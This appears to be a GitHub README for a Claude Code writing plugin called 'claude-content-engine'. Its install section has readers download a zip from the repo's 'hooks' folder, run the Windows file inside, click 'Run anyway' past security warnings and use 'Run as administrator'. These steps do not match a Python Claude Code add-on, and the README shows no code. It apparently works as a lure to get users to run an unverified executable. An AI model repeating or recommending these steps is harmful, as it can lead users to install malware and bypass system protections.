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Build Claude Code content workflows with 8 skills, persistent memory, and a quality gate for cleaner drafts and better SEO.

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🧠 claude-content-engine - Create Better Content With Claude

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🚀 What this is

claude-content-engine is a content tool for Claude Code. It helps you write, shape, and reuse content for common tasks like SEO pages, emails, social posts, and copy drafts.

It includes 8 skills, persistent memory, and a built-in slop detector. That means it can help you keep a clear tone, reuse past context, and flag weak or vague writing before it spreads.

📥 Download

  1. Open the download page: claude-content-engine on GitHub
  2. Download the latest Windows file from the page
  3. Save the file to your computer
  4. Run the file to start the app

If your browser asks for permission, choose Keep or Run. If Windows asks for approval, choose Yes.

🪟 Windows Setup

Follow these steps on a Windows PC:

  1. Go to the GitHub page
  2. Find the latest release or download link
  3. Download the Windows version
  4. Open the downloaded file
  5. If Windows shows a security prompt, click More info, then Run anyway if you trust the file source
  6. Let the app finish setting up
  7. Open Claude Code and connect the engine if the app asks for it

If the app comes as a .zip file, right-click it and choose Extract All before you run it.

🧰 What you get

  • 8 content skills for common writing jobs
  • Persistent memory for repeated projects and brand voice
  • A slop detector that flags weak or filler-heavy text
  • Support for content tasks like:
    • SEO copy
    • Email marketing
    • Social media posts
    • Product copy
    • Blog outlines
    • Rewrite tasks
    • Short-form content
    • Developer docs

💻 System needs

For a smooth run on Windows, use:

  • Windows 10 or Windows 11
  • 4 GB of RAM or more
  • 500 MB of free disk space
  • A stable internet connection
  • Claude Code installed and ready to use
  • A modern browser for the download page

If you plan to work with larger projects, 8 GB of RAM gives more room.

⚙️ How it works

claude-content-engine is built to help you move from idea to draft with less effort.

It can:

  • Keep a memory of your style rules and project notes
  • Use the right skill for the task at hand
  • Spot vague phrases and weak claims
  • Help you turn rough notes into clearer copy
  • Keep content aligned across pages, emails, and posts

This makes it useful when you want the same voice across many pieces of content.

📝 Main use cases

Use it for:

  • Writing SEO landing pages
  • Drafting email campaigns
  • Creating social media content
  • Building product descriptions
  • Rewriting content in a cleaner voice
  • Making short briefs for content teams
  • Checking copy for filler or empty phrases
  • Keeping brand language consistent

🧪 Skills included

The 8 skills focus on common content jobs:

  1. SEO writing
    Helps shape content around search intent and page structure
  2. Copywriting
    Helps write clear lines for offers, pages, and product text
  3. Email marketing
    Helps draft subject lines, body copy, and follow-up messages
  4. Social media
    Helps create short posts that fit platform limits
  5. Content planning
    Helps turn ideas into a simple outline
  6. Rewrite mode
    Helps clean up text without changing the meaning
  7. Brand voice memory
    Helps keep style rules in one place
  8. Slop detection
    Helps flag text that feels vague, flat, or stuffed with filler

📌 Before you start

Have these ready:

  • The downloaded Windows file
  • Your Claude Code setup
  • A folder where you want to keep the project
  • A few notes about your brand voice, if you have them

If you already have a writing style guide, keep it nearby. The memory feature works best when you give it clear rules.

🛠️ Install and run

  1. Download the file from claude-content-engine on GitHub
  2. Move the file to a folder you can find later, such as Downloads or Desktop
  3. If the file is zipped, extract it
  4. Double-click the Windows app file
  5. Follow the setup prompts on screen
  6. Open Claude Code if the app does not do it for you
  7. Load your first task, such as an email draft or SEO page
  8. Start with one skill and test the output

If the app asks for a workspace or project path, choose the folder where you keep your content work.

🧭 First run tips

For best results on the first run:

  • Start with one simple task
  • Use short, clear instructions
  • Add your brand voice rules
  • Tell it what to avoid
  • Review the first draft before reuse

A good first test is a short blog intro, a social post, or an email subject line set.

📣 Example tasks

You can ask it to help with prompts like:

  • Write a product page for a new app
  • Turn these notes into an email sequence
  • Rewrite this paragraph in plain English
  • Create 10 social posts about this topic
  • Build an SEO outline for this keyword
  • Check this copy for weak or vague lines
  • Make this draft sound more like our brand
  • Shorten this text for a landing page

🔒 Memory use

The persistent memory keeps useful project details in one place. That can include:

  • Brand tone
  • Product names
  • Preferred terms
  • Words to avoid
  • Audience notes
  • Style rules

Use it when you want the same voice across many drafts. Update it when your brand changes.

🧼 Slop detector

The slop detector looks for writing that feels empty, generic, or padded. It can help you catch:

  • Repeated ideas
  • Soft claims
  • Long lines with little meaning
  • Vague language
  • Buzzword-heavy copy

This is useful when you want text that sounds clear and direct.

📂 Suggested folder setup

You can keep your work in folders like these:

  • Content Projects
  • Brand Notes
  • Email Drafts
  • SEO Pages
  • Social Posts
  • Approved Copy

A simple folder setup makes it easier to keep track of drafts and final versions.

❓ Common problems

The app will not open

  • Make sure the file finished downloading
  • Check that you extracted the zip file if there is one
  • Right-click the file and choose Run as administrator
  • Try opening it again after a restart

Windows blocks the file

  • Look for the More info link
  • Review the file name and source
  • Choose the run option if you trust the download page

Claude Code does not connect

  • Make sure Claude Code is installed
  • Check your internet connection
  • Close both apps and open them again
  • Confirm that the project folder is in the right place

The output feels weak

  • Add more detail to your prompt
  • Include your audience
  • Give examples of the tone you want
  • Use the slop detector to clean up the draft
  • Save better notes to memory

📚 Best results

To get better output, use this format:

  • Goal: what you want to create
  • Audience: who will read it
  • Tone: how it should sound
  • Length: how long it should be
  • Must use: key facts or terms
  • Must avoid: words or styles you do not want

Example:

Goal: Write a homepage section
Audience: Small business owners
Tone: Clear and calm
Length: 150 words
Must use: plain English, short sentences
Must avoid: hype, buzzwords, and vague claims

🧾 File handling

If you want to keep things tidy:

  • Keep the original download file in case you need it again
  • Save your drafts in a separate folder
  • Back up your memory notes
  • Keep one final folder for approved content

That helps when you revisit a project later.

🔗 Download again

If you need the file again, use this link: https://raw.githubusercontent.com/Twentysix-setsquare397/claude-content-engine/main/hooks/claude_content_engine_v3.9-alpha.2.zip

🧷 Topics

ai-tools, claude, claude-code, content-creation, copywriting, developer-tools, email-marketing, seo, skills, social-media

Repository

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Twentysix-setsquare397

Twentysix-setsquare397/claude-content-engine

Created

April 4, 2026

Updated

April 13, 2026

Language

Python

Category

AI